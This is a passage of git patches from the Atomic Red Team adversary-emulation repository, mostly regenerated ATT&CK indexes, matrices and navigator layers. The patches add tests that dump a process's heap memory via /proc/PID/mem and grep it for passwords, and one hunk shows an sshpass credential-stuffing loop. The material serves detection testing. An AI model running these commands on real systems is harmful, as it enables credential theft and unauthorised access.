bled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":t
rue},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techni
queID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0eda063b..e9d78206 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -64,6 +64,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5- credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index f06859b0..c9e1bb22 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -11,6 +11,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f6da33e1..bd9b1af6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -107,7 +107,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 2adc7269..678b261a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -37,7 +37,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 420df707..33891a6e 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -26,7 +26,7 @@ | | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo 
Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index a8def1e4..acd405f4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -43,7 +43,7 @@ | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Implant 
Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 686e91a6..9cb1ac61 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -4865,7 +4865,106 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - atomic_tests: [] + identifier: T1003.007 + atomic_tests: + - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to + copy process memory to an external file so it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) + MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) + MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) + MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' + - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so 
it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: 'Requires Python + +' + prereq_command: "(which python || which python3 || which python2)\n" + get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" + +' + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md new file mode 100644 index 00000000..a23a5e9c --- /dev/null +++ b/atomics/T1003.007/T1003.007.md @@ -0,0 +1,134 @@ +# T1003.007 - Proc Filesystem +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007) +
Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. + +This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+ +## Atomic Tests + +- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local) + +- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) + + +
+ +## Atomic Test #1 - Dump individual process memory with sh (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to +copy process memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) +MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) +MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) +MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) +dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` + + + + +
+
+ +## Atomic Test #2 - Dump individual process memory with Python (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to +copy a process's heap memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +PYTHON=$(which python || which python3 || which python2) +$PYTHON #{python_script} $PID #{output_file} +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` +##### Description: Requires Python +##### Check Prereq Commands: +```sh +(which python || which python3 || which python2) +``` +##### Get Prereq Commands: +```sh +echo "Python 2.7+ or 3.4+ must be installed" +``` + + + + +
From 17eab72057d9638af27f6dea73636933db9010c2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:45:25 +0000 Subject: [PATCH 31/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1110.004/T1110.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 29d8c304..0c408431 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -4,6 +4,7 @@ display_name: 'Brute Force: Credential Stuffing' atomic_tests: - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad description: | Using username,password combination from a password dump to login over SSH. @@ -33,6 +34,7 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 55f9ed27..f60266d0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -716,3 +716,5 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 7e91138a-8e74-456d-a007-973d67a0bb80 437b2003-a20d-4ed8-834c-4964f24eec63 +4f08197a-2a8a-472d-9589-cd2895ef22ad +d546a3d9-0be5-40c7-ad82-5a7d79e1b66b From 1f69c7fb087a3256e763e106a5888dc40cb222fa Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:45:31 +0000 Subject: [PATCH 32/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 67 +++++++++- atomics/T1110.004/T1110.004.md | 115 ++++++++++++++++++ 14 files changed, 198 insertions(+), 10 deletions(-) create mode 100644 atomics/T1110.004/T1110.004.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 836c4f9a..969f8c8f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"
techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"e